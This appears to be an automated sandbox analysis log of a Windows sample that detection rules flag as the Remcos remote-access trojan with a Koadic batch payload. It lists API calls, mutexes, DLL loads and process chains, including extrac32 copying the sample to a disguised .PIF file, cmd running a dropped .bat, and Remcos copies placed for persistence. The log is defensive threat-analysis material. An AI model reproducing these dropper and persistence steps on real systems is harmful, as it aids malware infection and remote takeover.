              Source: Process Memory Space: udVh4Ist4Z.exe PID: 2056, type: MEMORYSTRMatched rule: Windows_Trojan_Remcos_b296e965 reference_sample = 0ebeffa44bd1c3603e30688ace84ea638fbcf485ca55ddcfd6fbe90609d4f3ed, os = windows, severity = x86, creation_date = 2021-06-10, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Remcos, fingerprint = a5267bc2dee28a3ef58beeb7e4a151699e3e561c16ce0ab9eb27de33c122664d, id = b296e965-a99e-4446-b969-ba233a2a8af4, last_modified = 2021-08-23
              Source: Process Memory Space: nmfsxfjX.pif PID: 5000, type: MEMORYSTRMatched rule: Windows_Trojan_Remcos_b296e965 reference_sample = 0ebeffa44bd1c3603e30688ace84ea638fbcf485ca55ddcfd6fbe90609d4f3ed, os = windows, severity = x86, creation_date = 2021-06-10, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Remcos, fingerprint = a5267bc2dee28a3ef58beeb7e4a151699e3e561c16ce0ab9eb27de33c122664d, id = b296e965-a99e-4446-b969-ba233a2a8af4, last_modified = 2021-08-23
              Source: Process Memory Space: nmfsxfjX.pif PID: 6400, type: MEMORYSTRMatched rule: Windows_Trojan_Remcos_b296e965 reference_sample = 0ebeffa44bd1c3603e30688ace84ea638fbcf485ca55ddcfd6fbe90609d4f3ed, os = windows, severity = x86, creation_date = 2021-06-10, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Remcos, fingerprint = a5267bc2dee28a3ef58beeb7e4a151699e3e561c16ce0ab9eb27de33c122664d, id = b296e965-a99e-4446-b969-ba233a2a8af4, last_modified = 2021-08-23
              Source: Process Memory Space: nmfsxfjX.pif PID: 2420, type: MEMORYSTRMatched rule: Windows_Trojan_Remcos_b296e965 reference_sample = 0ebeffa44bd1c3603e30688ace84ea638fbcf485ca55ddcfd6fbe90609d4f3ed, os = windows, severity = x86, creation_date = 2021-06-10, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Remcos, fingerprint = a5267bc2dee28a3ef58beeb7e4a151699e3e561c16ce0ab9eb27de33c122664d, id = b296e965-a99e-4446-b969-ba233a2a8af4, last_modified = 2021-08-23
              Source: C:\Users\Public\Libraries\XjfxsfmnO.bat, type: DROPPEDMatched rule: MALWARE_BAT_KoadicBAT author = ditekSHen, description = Koadic post-exploitation framework BAT payload
              Source: classification engine | Classification label: mal100.rans.troj.spyw.expl.evad.winEXE@24/14@4/1
              Source: C:\Users\Public\Libraries\nmfsxfjX.pif | Code function: 6_1_00417952 GetCurrentProcess, OpenProcessToken, LookupPrivilegeValueA, AdjustTokenPrivileges, GetLastError
              Source: C:\Users\Public\Libraries\nmfsxfjX.pif | Code function: 10_1_00417952 GetCurrentProcess, OpenProcessToken, LookupPrivilegeValueA, AdjustTokenPrivileges, GetLastError
              Source: C:\Users\user\Desktop\udVh4Ist4Z.exe | Code function: 0_2_02D67F90 GetDiskFreeSpaceA
              Source: C:\Users\Public\Libraries\nmfsxfjX.pif | Code function: 6_1_0040F474 GetModuleFileNameW, CreateToolhelp32Snapshot, Process32FirstW, Process32NextW, CloseHandle, CloseHandle
              Source: C:\Users\user\Desktop\udVh4Ist4Z.exe | Code function: 0_2_02D76D84 CoCreateInstance
              Source: C:\Users\Public\Libraries\nmfsxfjX.pif | Code function: 6_1_0041B4A8 FindResourceA, LoadResource, LockResource, SizeofResource
              Source: C:\Users\Public\Libraries\nmfsxfjX.pif | Code function: 6_1_0041AA4A OpenSCManagerW, OpenServiceW, CloseServiceHandle, StartServiceW, CloseServiceHandle, CloseServiceHandle, CloseServiceHandle
              Source: C:\Users\user\Desktop\udVh4Ist4Z.exe | File created: C:\Users\Public\Libraries\Null
              Source: C:\Users\Public\Libraries\nmfsxfjX.pif | Mutant created: \Sessions\1\BaseNamedObjects\Rmc-L24XL1
              Source: C:\Windows\System32\conhost.exe | Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:4488:120:WilError_03
              Source: C:\Users\user\Desktop\udVh4Ist4Z.exe | Process created: C:\Windows\SysWOW64\cmd.exe C:\Windows\system32\cmd.exe /c ""C:\Users\Public\Libraries\XjfxsfmnO.bat" "
              Source: C:\Users\Public\Libraries\nmfsxfjX.pif | Command line argument: PG (6_1_0040E9C5)
              Source: C:\Users\Public\Libraries\nmfsxfjX.pif | Command line argument: Software\ (6_1_0040E9C5)
              Source: C:\Users\Public\Libraries\nmfsxfjX.pif | Command line argument: Rmc-L24XL1 (6_1_0040E9C5)
              Source: C:\Users\Public\Libraries\nmfsxfjX.pif | Command line argument: Exe (6_1_0040E9C5)
              Source: C:\Users\Public\Libraries\nmfsxfjX.pif | Command line argument: Inj (6_1_0040E9C5)
              Source: C:\Users\Public\Libraries\nmfsxfjX.pif | Command line argument: 8SG (6_1_0040E9C5)
              Source: C:\Users\Public\Libraries\nmfsxfjX.pif | Command line argument: exepath (6_1_0040E9C5)
              Source: C:\Users\Public\Libraries\nmfsxfjX.pif | Command line argument: licence (6_1_0040E9C5)
              Source: C:\Users\Public\Libraries\nmfsxfjX.pif | Command line argument: dMG (6_1_0040E9C5)
              Source: C:\Users\Public\Libraries\nmfsxfjX.pif | Command line argument: PSG (6_1_0040E9C5)
              Source: C:\Users\Public\Libraries\nmfsxfjX.pif | Command line argument: Administrator (6_1_0040E9C5)
              Source: C:\Users\Public\Libraries\nmfsxfjX.pif | Command line argument: User (6_1_0040E9C5)
              Source: C:\Users\Public\Libraries\nmfsxfjX.pif | Command line argument: del (6_1_0040E9C5)
              Source: C:\Users\Public\Libraries\nmfsxfjX.pif | Command line argument: PG (10_1_0040E9C5)
              Source: C:\Users\Public\Libraries\nmfsxfjX.pif | Command line argument: Software\ (10_1_0040E9C5)
              Source: C:\Users\Public\Libraries\nmfsxfjX.pif | Command line argument: Rmc-L24XL1 (10_1_0040E9C5)
              Source: C:\Users\Public\Libraries\nmfsxfjX.pif | Command line argument: Exe (10_1_0040E9C5)
              Source: C:\Users\Public\Libraries\nmfsxfjX.pif | Command line argument: Inj (10_1_0040E9C5)
              Source: C:\Users\Public\Libraries\nmfsxfjX.pif | Command line argument: 8SG (10_1_0040E9C5)
              Source: C:\Users\Public\Libraries\nmfsxfjX.pif | Command line argument: exepath (10_1_0040E9C5)
              Source: C:\Users\Public\Libraries\nmfsxfjX.pif | Command line argument: licence (10_1_0040E9C5)
              Source: C:\Users\Public\Libraries\nmfsxfjX.pif | Command line argument: dMG (10_1_0040E9C5)
              Source: C:\Users\Public\Libraries\nmfsxfjX.pif | Command line argument: PSG (10_1_0040E9C5)
              Source: C:\Users\Public\Libraries\nmfsxfjX.pif | Command line argument: Administrator (10_1_0040E9C5)
              Source: C:\Users\Public\Libraries\nmfsxfjX.pif | Command line argument: User (10_1_0040E9C5)
              Source: C:\Users\Public\Libraries\nmfsxfjX.pif | Command line argument: del (10_1_0040E9C5)
              Source: C:\Users\user\Desktop\udVh4Ist4Z.exe | Key opened: HKEY_CURRENT_USER\Software\Borland\Delphi\Locales
              Source: C:\Users\Public\Libraries\Xjfxsfmn.PIF | Key opened: HKEY_CURRENT_USER\Software\Borland\Delphi\Locales
              Source: C:\Users\Public\Libraries\nmfsxfjX.pif | File read: C:\Users\user\Desktop\desktop.ini
              Source: C:\Users\user\Desktop\udVh4Ist4Z.exe | Key opened: HKEY_CURRENT_USER\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiers
              Source: udVh4Ist4Z.exe | ReversingLabs: Detection: 63%
              Source: udVh4Ist4Z.exe | Virustotal: Detection: 66%
              Source: C:\Users\user\Desktop\udVh4Ist4Z.exe | File read: C:\Users\user\Desktop\udVh4Ist4Z.exe
              Source: unknown | Process created: C:\Users\user\Desktop\udVh4Ist4Z.exe "C:\Users\user\Desktop\udVh4Ist4Z.exe"
              Source: C:\Users\user\Desktop\udVh4Ist4Z.exe | Process created: C:\Windows\SysWOW64\cmd.exe C:\Windows\system32\cmd.exe /c ""C:\Users\Public\Libraries\XjfxsfmnO.bat" "
              Source: C:\Windows\SysWOW64\cmd.exe | Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
              Source: C:\Users\user\Desktop\udVh4Ist4Z.exe | Process created: C:\Windows\SysWOW64\extrac32.exe C:\\Windows\\System32\\extrac32.exe /C /Y C:\Users\user\Desktop\udVh4Ist4Z.exe C:\\Users\\Public\\Libraries\\Xjfxsfmn.PIF
              Source: C:\Users\user\Desktop\udVh4Ist4Z.exe | Process created: C:\Users\Public\Libraries\nmfsxfjX.pif C:\Users\Public\Libraries\nmfsxfjX.pif
              Source: C:\Users\Public\Libraries\nmfsxfjX.pif | Process created: C:\ProgramData\Remcos\remcos.exe "C:\ProgramData\Remcos\remcos.exe"
              Source: unknown | Process created: C:\Users\Public\Libraries\Xjfxsfmn.PIF "C:\Users\Public\Libraries\Xjfxsfmn.PIF"
              Source: C:\Users\Public\Libraries\Xjfxsfmn.PIF | Process created: C:\Users\Public\Libraries\nmfsxfjX.pif C:\Users\Public\Libraries\nmfsxfjX.pif
              Source: C:\Users\Public\Libraries\nmfsxfjX.pif | Process created: C:\Users\user\AppData\Roaming\Remcos\remcos.exe "C:\Users\user\AppData\Roaming\Remcos\remcos.exe"
              Source: unknown | Process created: C:\ProgramData\Remcos\remcos.exe "C:\ProgramData\Remcos\remcos.exe"
              Source: unknown | Process created: C:\Users\user\AppData\Roaming\Remcos\remcos.exe "C:\Users\user\AppData\Roaming\Remcos\remcos.exe"
              Source: C:\Users\user\Desktop\udVh4Ist4Z.exe | Section loaded: apphelp.dll
              Source: C:\Users\user\Desktop\udVh4Ist4Z.exe | Section loaded: version.dll
              Source: C:\Users\user\Desktop\udVh4Ist4Z.exe | Section loaded: uxtheme.dll
              Source: C:\Users\user\Desktop\udVh4Ist4Z.exe | Section loaded: archiveint.dll
              Source: C:\Users\user\Desktop\udVh4Ist4Z.exe | Section loaded: cryptsp.dll
              Source: C:\Users\user\Desktop\udVh4Ist4Z.exe | Section loaded: url.dll
              Source: C:\Users\user\Desktop\udVh4Ist4Z.exe | Section loaded: ieframe.dll
              Source: C:\Users\user\Desktop\udVh4Ist4Z.exe | Section loaded: iertutil.dll
              Source: C:\Users\user\Desktop\udVh4Ist4Z.exe | Section loaded: netapi32.dll
              Source: C:\Users\user\Desktop\udVh4Ist4Z.exe | Section loaded: userenv.dll
              Source: C:\Users\user\Desktop\udVh4Ist4Z.exe | Section loaded: winhttp.dll
              Source: C:\Users\user\Desktop\udVh4Ist4Z.exe | Section loaded: wkscli.dll
              Source: C:\Users\user\Desktop\udVh4Ist4Z.exe | Section loaded: netutils.dll
              Source: C:\Users\user\Desktop\udVh4Ist4Z.exe | Section loaded: amsi.dll
              Source: C:\Users\user\Desktop\udVh4Ist4Z.exe | Section loaded: endpointdlp.dll
              Source: C:\Users\user\Desktop\udVh4Ist4Z.exe | Section loaded: eamsi.dll
              Source: C:\Users\user\Desktop\udVh4Ist4Z.exe | Section loaded: smartscreenps.dll
              Source: C:\Users\user\Desktop\udVh4Ist4Z.exe | Section loaded: kernel.appcore.dll
              Source: C:\Users\user\Desktop\udVh4Ist4Z.exe | Section loaded: am.dll
              Source: C:\Users\user\Desktop\udVh4Ist4Z.exeSection loaded: amsi.dllJump to behavior
              Source: C:\Users\user\Desktop\udVh4Ist4Z.exeSection loaded: amsi.dllJump to behavior
              Source: C:\Users\user\Desktop\udVh4Ist4Z.exeSection loaded: amsi.dllJump to behavior
              Source: C:\Users\user\Desktop\udVh4Ist4Z.exeSection loaded: amsi.dllJump to behavior
              Source: C:\Users\user\Desktop\udVh4Ist4Z.exeSection loaded: amsi.dllJump to behavior
              Source: C:\Users\user\Desktop\udVh4Ist4Z.exeSection loaded: amsi.dllJump to behavior
              Source: C:\Users\user\Desktop\udVh4Ist4Z.exeSection loaded: amsi.dllJump to behavior
              Source: C:\Users\user\Desktop\udVh4Ist4Z.exeSection loaded: amsi.dllJump to behavior
              Source: C:\Users\user\Desktop\udVh4Ist4Z.exeSection loaded: amsi.dllJump to behavior
              Source: C:\Users\user\Desktop\udVh4Ist4Z.exeSection loaded: amsi.dllJump to behavior
              Source: C:\Users\user\Desktop\udVh4Ist4Z.exeSection loaded: amsi.dllJump to behavior
              Source: C:\Users\user\Desktop\udVh4Ist4Z.exeSection loaded: amsi.dllJump to behavior
              Source: C:\Users\user\Desktop\udVh4Ist4Z.exeSection loaded: amsi.dllJump to behavior
              Source: C:\Users\user\Desktop\udVh4Ist4Z.exeSection loaded: amsi.dllJump to behavior
              Source: C:\Users\user\Desktop\udVh4Ist4Z.exeSection loaded: amsi.dllJump to behavior
              Source: C:\Users\user\Desktop\udVh4Ist4Z.exeSection loaded: amsi.dllJump to behavior
              Source: C:\Users\user\Desktop\udVh4Ist4Z.exeSection loaded: amsi.dllJump to behavior
              Source: C:\Users\user\Desktop\udVh4Ist4Z.exeSection loaded: amsi.dllJump to behavior
              Source: C:\Users\user\Desktop\udVh4Ist4Z.exeSection loaded: amsi.dllJump to behavior
              Source: C:\Users\user\Desktop\udVh4Ist4Z.exeSection loaded: amsi.dllJump to behavior
              Source: C:\Users\user\Desktop\udVh4Ist4Z.exeSection loaded: amsi.dllJump to behavior
              Source: C:\Users\user\Desktop\udVh4Ist4Z.exeSection loaded: amsi.dllJump to behavior
              Source: C:\Users\user\Desktop\udVh4Ist4Z.exeSection loaded: amsi.dllJump to behavior
              Source: C:\Users\user\Desktop\udVh4Ist4Z.exeSection loaded: amsi.dllJump to behavior
              Source: C:\Users\user\Desktop\udVh4Ist4Z.exeSection loaded: amsi.dllJump to behavior
              Source: C:\Users\user\Desktop\udVh4Ist4Z.exeSection loaded: amsi.dllJump to behavior
              Source: C:\Users\user\Desktop\udVh4Ist4Z.exeSection loaded: amsi.dllJump to behavior
              Source: C:\Users\user\Desktop\udVh4Ist4Z.exeSection loaded: amsi.dllJump to behavior
              Source: C:\Users\user\Desktop\udVh4Ist4Z.exeSection loaded: amsi.dllJump to behavior
              Source: C:\Users\user\Desktop\udVh4Ist4Z.exeSection loaded: amsi.dllJump to behavior
              Source: C:\Users\user\Desktop\udVh4Ist4Z.exeSection loaded: amsi.dllJump to behavior
              Source: C:\Users\user\Desktop\udVh4Ist4Z.exeSection loaded: amsi.dllJump to behavior
              Source: C:\Users\user\Desktop\udVh4Ist4Z.exeSection loaded: amsi.dllJump to behavior
              Source: C:\Users\user\Desktop\udVh4Ist4Z.exeSection loaded: amsi.dllJump to behavior
              Source: C:\Users\user\Desktop\udVh4Ist4Z.exeSection loaded: amsi.dllJump to behavior
              Source: C:\Users\user\Desktop\udVh4Ist4Z.exeSection loaded: amsi.dllJump to behavior
              Source: C:\Users\user\Desktop\udVh4Ist4Z.exeSection loaded: amsi.dllJump to behavior
              Source: C:\Users\user\Desktop\udVh4Ist4Z.exeSection loaded: amsi.dllJump to behavior
              Source: C:\Users\user\Desktop\udVh4Ist4Z.exeSection loaded: amsi.dllJump to behavior
              Source: C:\Users\user\Desktop\udVh4Ist4Z.exeSection loaded: am.dllJump to behavior
              Source: C:\Users\user\Desktop\udVh4Ist4Z.exeSection loaded: am.dllJump to behavior
              Source: C:\Users\user\Desktop\udVh4Ist4Z.exeSection loaded: amsi.dllJump to behavior
              Source: C:\Users\user\Desktop\udVh4Ist4Z.exeSection loaded: amsi.dllJump to behavior
              Source: C:\Users\user\Desktop\udVh4Ist4Z.exeSection loaded: amsi.dllJump to behavior
              Source: C:\Users\user\Desktop\udVh4Ist4Z.exeSection loaded: amsi.dllJump to behavior
              Source: C:\Users\user\Desktop\udVh4Ist4Z.exeSection loaded: amsi.dllJump to behavior
              Source: C:\Users\user\Desktop\udVh4Ist4Z.exeSection loaded: amsi.dllJump to behavior
              Source: C:\Users\user\Desktop\udVh4Ist4Z.exeSection loaded: amsi.dllJump to behavior
              Source: C:\Users\user\Desktop\udVh4Ist4Z.exeSection loaded: amsi.dllJump to behavior
              Source: C:\Users\user\Desktop\udVh4Ist4Z.exeSection loaded: amsi.dllJump to behavior
              Source: C:\Users\user\Desktop\udVh4Ist4Z.exeSection loaded: amsi.dllJump to behavior
              Source: C:\Users\user\Desktop\udVh4Ist4Z.exeSection loaded: amsi.dllJump to behavior
              Source: C:\Users\user\Desktop\udVh4Ist4Z.exeSection loaded: amsi.dllJump to behavior
              Source: C:\Users\user\Desktop\udVh4Ist4Z.exeSection loaded: amsi.dllJump to behavior
              Source: C:\Users\user\Desktop\udVh4Ist4Z.exeSection loaded: amsi.dllJump to behavior
              Source: C:\Users\user\Desktop\udVh4Ist4Z.exeSection loaded: amsi.dllJump to behavior
              Source: C:\Users\user\Desktop\udVh4Ist4Z.exeSection loaded: amsi.dllJump to behavior
              Source: C:\Users\user\Desktop\udVh4Ist4Z.exeSection loaded: amsi.dllJump to behavior
              Source: C:\Users\user\Desktop\udVh4Ist4Z.exeSection loaded: amsi.dllJump to behavior
              Source: C:\Users\user\Desktop\udVh4Ist4Z.exeSection loaded: amsi.dllJump to behavior
              Source: C:\Users\user\Desktop\udVh4Ist4Z.exeSection loaded: amsi.dllJump to behavior
              Source: C:\Users\user\Desktop\udVh4Ist4Z.exeSection loaded: amsi.dllJump to behavior
              Source: C:\Users\user\Desktop\udVh4Ist4Z.exeSection loaded: amsi.dllJump to behavior
              Source: C:\Users\user\Desktop\udVh4Ist4Z.exeSection loaded: winmm.dllJump to behavior
              Source: C:\Users\user\Desktop\udVh4Ist4Z.exeSection loaded: amsi.dllJump to behavior
              Source: C:\Users\user\Desktop\udVh4Ist4Z.exeSection loaded: amsi.dllJump to behavior
              Source: C:\Users\user\Desktop\udVh4Ist4Z.exeSection loaded: amsi.dllJump to behavior
              Source: C:\Users\user\Desktop\udVh4Ist4Z.exeSection loaded: amsi.dllJump to behavior
              Source: C:\Users\user\Desktop\udVh4Ist4Z.exeSection loaded: amsi.dllJump to behavior
              Source: C:\Users\user\Desktop\udVh4Ist4Z.exeSection loaded: amsi.dllJump to behavior
              Source: C:\Users\user\Desktop\udVh4Ist4Z.exeSection loaded: amsi.dllJump to behavior
              Source: C:\Users\user\Desktop\udVh4Ist4Z.exeSection loaded: amsi.dllJump to behavior
              Source: C:\Users\user\Desktop\udVh4Ist4Z.exeSection loaded: amsi.dllJump to behavior
              Source: C:\Users\user\Desktop\udVh4Ist4Z.exeSection loaded: amsi.dllJump to behavior
              Source: C:\Users\user\Desktop\udVh4Ist4Z.exeSection loaded: amsi.dllJump to behavior
              Source: C:\Users\user\Desktop\udVh4Ist4Z.exeSection loaded: amsi.dllJump to behavior
              Source: C:\Users\user\Desktop\udVh4Ist4Z.exeSection loaded: amsi.dllJump to behavior
              Source: C:\Users\user\Desktop\udVh4Ist4Z.exeSection loaded: amsi.dllJump to behavior
              Source: C:\Users\user\Desktop\udVh4Ist4Z.exeSection loaded: amsi.dllJump to behavior
              Source: C:\Users\user\Desktop\udVh4Ist4Z.exeSection loaded: amsi.dllJump to behavior
              Source: C:\Users\user\Desktop\udVh4Ist4Z.exeSection loaded: amsi.dllJump to behavior
              Source: C:\Users\user\Desktop\udVh4Ist4Z.exeSection loaded: amsi.dllJump to behavior
              Source: C:\Users\user\Desktop\udVh4Ist4Z.exeSection loaded: wininet.dllJump to behavior
              Source: C:\Users\user\Desktop\udVh4Ist4Z.exeSection loaded: amsi.dllJump to behavior
              Source: C:\Users\user\Desktop\udVh4Ist4Z.exeSection loaded: amsi.dllJump to behavior
              Source: C:\Users\user\Desktop\udVh4Ist4Z.exeSection loaded: am.dllJump to behavior
              Source: C:\Users\user\Desktop\udVh4Ist4Z.exeSection loaded: am.dllJump to behavior
              Source: C:\Users\user\Desktop\udVh4Ist4Z.exeSection loaded: am.dllJump to behavior
              Source: C:\Users\user\Desktop\udVh4Ist4Z.exeSection loaded: am.dllJump to behavior
              Source: C:\Users\user\Desktop\udVh4Ist4Z.exeSection loaded: am.dllJump to behavior
              Source: C:\Users\user\Desktop\udVh4Ist4Z.exeSection loaded: am.dllJump to behavior
              Source: C:\Users\user\Desktop\udVh4Ist4Z.exeSection loaded: am.dllJump to behavior
              Source: C:\Users\user\Desktop\udVh4Ist4Z.exeSection loaded: am.dllJump to behavior
              Source: C:\Users\user\Desktop\udVh4Ist4Z.exeSection loaded: am.dllJump to behavior
              Source: C:\Users\user\Desktop\udVh4Ist4Z.exeSection loaded: am.dllJump to behavior
              Source: C:\Users\user\Desktop\udVh4Ist4Z.exeSection loaded: am.dllJump to behavior
              Source: C:\Users\user\Desktop\udVh4Ist4Z.exeSection loaded: am.dllJump to behavior
              Source: C:\Users\user\Desktop\udVh4Ist4Z.exeSection loaded: am.dllJump to behavior
              Source: C:\Users\user\Desktop\udVh4Ist4Z.exeSection loaded: am.dllJump to behavior
              Source: C:\Users\user\Desktop\udVh4Ist4Z.exeSection loaded: am.dllJump to behavior
              Source: C:\Users\user\Desktop\udVh4Ist4Z.exeSection loaded: am.dllJump to behavior
              Source: C:\Users\user\Desktop\udVh4Ist4Z.exeSection loaded: am.dllJump to behavior
              Source: C:\Users\user\Desktop\udVh4Ist4Z.exeSection loaded: am.dllJump to behavior
              Source: C:\Users\user\Desktop\udVh4Ist4Z.exeSection loaded: am.dllJump to behavior
              Source: C:\Users\user\Desktop\udVh4Ist4Z.exeSection loaded: am.dllJump to behavior
              Source: C:\Users\user\Desktop\udVh4Ist4Z.exeSection loaded: am.dllJump to behavior
              Source: C:\Users\user\Desktop\udVh4Ist4Z.exeSection loaded: sspicli.dllJump to behavior
              Source: C:\Users\user\Desktop\udVh4Ist4Z.exeSection loaded: windows.storage.dllJump to behavior
              Source: C:\Users\user\Desktop\udVh4Ist4Z.exeSection loaded: wldp.dllJump to behavior
              Source: C:\Users\user\Desktop\udVh4Ist4Z.exeSection loaded: profapi.dllJump to behavior
              Source: C:\Users\user\Desktop\udVh4Ist4Z.exeSection loaded: kernel.appcore.dllJump to behavior
              Source: C:\Users\user\Desktop\udVh4Ist4Z.exeSection loaded: ondemandconnroutehelper.dllJump to behavior
              Source: C:\Users\user\Desktop\udVh4Ist4Z.exeSection loaded: ??.dllJump to behavior
              Source: C:\Users\user\Desktop\udVh4Ist4Z.exeSection loaded: ??.dllJump to behavior
              Source: C:\Users\user\Desktop\udVh4Ist4Z.exeSection loaded: ??.dllJump to behavior
              Source: C:\Users\user\Desktop\udVh4Ist4Z.exeSection loaded: ??.dllJump to behavior
              Source: C:\Users\user\Desktop\udVh4Ist4Z.exeSection loaded: ??.dllJump to behavior
              Source: C:\Users\user\Desktop\udVh4Ist4Z.exeSection loaded: ???y.dllJump to behavior
              Source: C:\Users\user\Desktop\udVh4Ist4Z.exeSection loaded: ???y.dllJump to behavior
              Source: C:\Users\user\Desktop\udVh4Ist4Z.exeSection loaded: ???y.dllJump to behavior
              Source: C:\Users\user\Desktop\udVh4Ist4Z.exeSection loaded: ??.dllJump to behavior
              Source: C:\Users\user\Desktop\udVh4Ist4Z.exeSection loaded: ????.dllJump to behavior
              Source: C:\Users\user\Desktop\udVh4Ist4Z.exeSection loaded: ????.dllJump to behavior
              Source: C:\Users\user\Desktop\udVh4Ist4Z.exeSection loaded: ????.dllJump to behavior
              Source: C:\Users\user\Desktop\udVh4Ist4Z.exeSection loaded: ??.dllJump to behavior
              Source: C:\Users\user\Desktop\udVh4Ist4Z.exeSection loaded: ??.dllJump to behavior
              Source: C:\Users\user\Desktop\udVh4Ist4Z.exeSection loaded: ???2.dllJump to behavior
              Source: C:\Users\user\Desktop\udVh4Ist4Z.exeSection loaded: ???2.dllJump to behavior
              Source: C:\Users\user\Desktop\udVh4Ist4Z.exeSection loaded: ???2.dllJump to behavior
              Source: C:\Users\user\Desktop\udVh4Ist4Z.exeSection loaded: ??.dllJump to behavior
              Source: C:\Users\user\Desktop\udVh4Ist4Z.exeSection loaded: ???.dllJump to behavior
              Source: C:\Users\user\Desktop\udVh4Ist4Z.exeSection loaded: ???.dllJump to behavior
              Source: C:\Users\user\Desktop\udVh4Ist4Z.exeSection loaded: ???.dllJump to behavior
              Source: C:\Users\user\Desktop\udVh4Ist4Z.exeSection loaded: ??.dllJump to behavior
              Source: C:\Users\user\Desktop\udVh4Ist4Z.exeSection loaded: ??.dllJump to behavior
              Source: C:\Users\user\Desktop\udVh4Ist4Z.exeSection loaded: ??????s.dllJump to behavior
              Source: C:\Users\user\Desktop\udVh4Ist4Z.exeSection loaded: ??????s.dllJump to behavior
              Source: C:\Users\user\Desktop\udVh4Ist4Z.exeSection loaded: ??????s.dllJump to behavior
              Source: C:\Users\user\Desktop\udVh4Ist4Z.exeSection loaded: ??.dllJump to behavior
              Source: C:\Users\user\Desktop\udVh4Ist4Z.exeSection loaded: ??.dllJump to behavior
              Source: C:\Users\user\Desktop\udVh4Ist4Z.exeSection loaded: ??.dllJump to behavior
              Source: C:\Users\user\Desktop\udVh4Ist4Z.exeSection loaded: ??.dllJump to behavior
              Source: C:\Users\user\Desktop\udVh4Ist4Z.exeSection loaded: ??.dllJump to behavior
              Source: C:\Users\user\Desktop\udVh4Ist4Z.exeSection loaded: ??.dllJump to behavior
              Source: C:\Users\user\Desktop\udVh4Ist4Z.exeSection loaded: ??.dllJump to behavior
              Source: C:\Users\user\Desktop\udVh4Ist4Z.exeSection loaded: ??.dllJump to behavior
              Source: C:\Users\user\Desktop\udVh4Ist4Z.exeSection loaded: ??.dllJump to behavior
              Source: C:\Users\user\Desktop\udVh4Ist4Z.exeSection loaded: ??.dllJump to behavior
              Source: C:\Users\user\Desktop\udVh4Ist4Z.exeSection loaded: ??.dllJump to behavior
              Source: C:\Users\user\Desktop\udVh4Ist4Z.exeSection loaded: ??.dllJump to behavior
              Source: C:\Users\user\Desktop\udVh4Ist4Z.exeSection loaded: ??.dllJump to behavior
              Source: C:\Users\user\Desktop\udVh4Ist4Z.exeSection loaded: ??.dllJump to behavior
              Source: C:\Users\user\Desktop\udVh4Ist4Z.exeSection loaded: ??.dllJump to behavior
              Source: C:\Users\user\Desktop\udVh4Ist4Z.exeSection loaded: ??.dllJump to behavior
              Source: C:\Users\user\Desktop\udVh4Ist4Z.exeSection loaded: ??.dllJump to behavior
              Source: C:\Users\user\Desktop\udVh4Ist4Z.exeSection loaded: ??.dllJump to behavior
              Source: C:\Users\user\Desktop\udVh4Ist4Z.exeSection loaded: ??.dllJump to behavior
              Source: C:\Users\user\Desktop\udVh4Ist4Z.exeSection loaded: ??.dllJump to behavior
              Source: C:\Users\user\Desktop\udVh4Ist4Z.exeSection loaded: ??.dllJump to behavior
              Source: C:\Users\user\Desktop\udVh4Ist4Z.exeSection loaded: ??.dllJump to behavior
              Source: C:\Users\user\Desktop\udVh4Ist4Z.exeSection loaded: ??.dllJump to behavior
              Source: C:\Users\user\Desktop\udVh4Ist4Z.exeSection loaded: mswsock.dllJump to behavior
              Source: C:\Users\user\Desktop\udVh4Ist4Z.exeSection loaded: ??.dllJump to behavior
              Source: C:\Users\user\Desktop\udVh4Ist4Z.exeSection loaded: ??.dllJump to behavior
              Source: C:\Users\user\Desktop\udVh4Ist4Z.exeSection loaded: ??.dllJump to behavior
              Source: C:\Users\user\Desktop\udVh4Ist4Z.exeSection loaded: ??.dllJump to behavior
              Source: C:\Users\user\Desktop\udVh4Ist4Z.exeSection loaded: ??.dllJump to behavior
              Source: C:\Users\user\Desktop\udVh4Ist4Z.exeSection loaded: ??.dllJump to behavior
              Source: C:\Users\user\Desktop\udVh4Ist4Z.exeSection loaded: ??.dllJump to behavior
              Source: C:\Users\user\Desktop\udVh4Ist4Z.exeSection loaded: ??.dllJump to behavior
              Source: C:\Users\user\Desktop\udVh4Ist4Z.exeSection loaded: ??.dllJump to behavior
              Source: C:\Users\user\Desktop\udVh4Ist4Z.exeSection loaded: ??.dllJump to behavior
              Source: C:\Users\user\Desktop\udVh4Ist4Z.exeSection loaded: ??.dllJump to behavior
              Source: C:\Users\user\Desktop\udVh4Ist4Z.exeSection loaded: ??.dllJump to behavior
              Source: C:\Users\user\Desktop\udVh4Ist4Z.exeSection loaded: ??.dllJump to behavior
              Source: C:\Users\user\Desktop\udVh4Ist4Z.exeSection loaded: ??.dllJump to behavior
              Source: C:\Users\user\Desktop\udVh4Ist4Z.exeSection loaded: ??.dllJump to behavior
              Source: C:\Users\user\Desktop\udVh4Ist4Z.exeSection loaded: ??.dllJump to behavior
              Source: C:\Users\user\Desktop\udVh4Ist4Z.exeSection loaded: ??.dllJump to behavior
              Source: C:\Users\user\Desktop\udVh4Ist4Z.exeSection loaded: ??.dllJump to behavior
              Source: C:\Users\user\Desktop\udVh4Ist4Z.exeSection loaded: ??.dllJump to behavior
              Source: C:\Users\user\Desktop\udVh4Ist4Z.exeSection loaded: ??.dllJump to behavior
              Source: C:\Users\user\Desktop\udVh4Ist4Z.exeSection loaded: ??.dllJump to behavior
              Source: C:\Users\user\Desktop\udVh4Ist4Z.exeSection loaded: ??.dllJump to behavior
              Source: C:\Users\user\Desktop\udVh4Ist4Z.exeSection loaded: dnsapi.dllJump to behavior
              Source: C:\Users\user\Desktop\udVh4Ist4Z.exeSection loaded: iphlpapi.dllJump to behavior
              Source: C:\Users\user\Desktop\udVh4Ist4Z.exeSection loaded: rasadhlp.dllJump to behavior
              Source: C:\Users\user\Desktop\udVh4Ist4Z.exeSection loaded: winnsi.dllJump to behavior
              Source: C:\Users\user\Desktop\udVh4Ist4Z.exeSection loaded: fwpuclnt.dllJump to behavior
              Source: C:\Users\user\Desktop\udVh4Ist4Z.exeSection loaded: ??.dllJump to behavior
              Source: C:\Users\user\Desktop\udVh4Ist4Z.exeSection loaded: ??.dllJump to behavior
              Source: C:\Users\user\Desktop\udVh4Ist4Z.exeSection loaded: ??.dllJump to behavior
